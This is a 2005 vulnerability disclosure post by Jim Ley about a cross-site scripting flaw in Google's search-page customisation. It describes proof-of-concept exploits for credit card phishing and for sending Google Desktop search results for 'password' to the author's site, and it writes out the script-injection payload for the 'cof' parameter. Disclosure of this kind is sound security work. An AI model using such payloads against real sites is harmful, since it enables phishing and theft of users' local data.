Google Base Exploit

Simple Google Cross Site Scripting Exploit.
15th November 2005
Jim Ley,

The Problem

For over two years Google has had an script insertion flaw, I reported it two years ago, and again a couple of months ago, but still it's not been fixed. Google Desktop has made the situation worse, as now google search results include the content of local files in the search results. With this in mind I produced a couple of simple example exploits.

Credit Card Phishing example

You can replace the content of the Google page with your own content, here I replaced it with a simple credit card submission form suggesting that google will shortly become a subscription service. Screenshot of it in use.

The desktop sniffer example

Visit Google with this link, and the inserted google desktop search for password will be reported to my site.

The exploit might be easier to do with a custom form:


The exploit is simple: simply include a search term cof with the value: L:javascript:javascript:document.appendChild(document.createElement('script')).src='' and the page will load the script from my domain. The problem is that google fails to correctly check that the image you reference to cutomise the look is an actual image, and not some script, this is a well known problem for web authors, There was a CERT advisory back in 2000 along with tips on how to mitigate against it, google developers seem to have missed them though. That script can obviously do anything has permission for - what it does is in the second case is create a hidden IFRAME containing a regular google search for password (or the search term you used if you used one) and return part of the page to a page on my site which stores the data, the first replaces it with a form requesting a credit card number to buy access to google, with all the details forwarded to my site.

Screenshot of the phishing exploit

Screenshot of Google showing inserted credit card form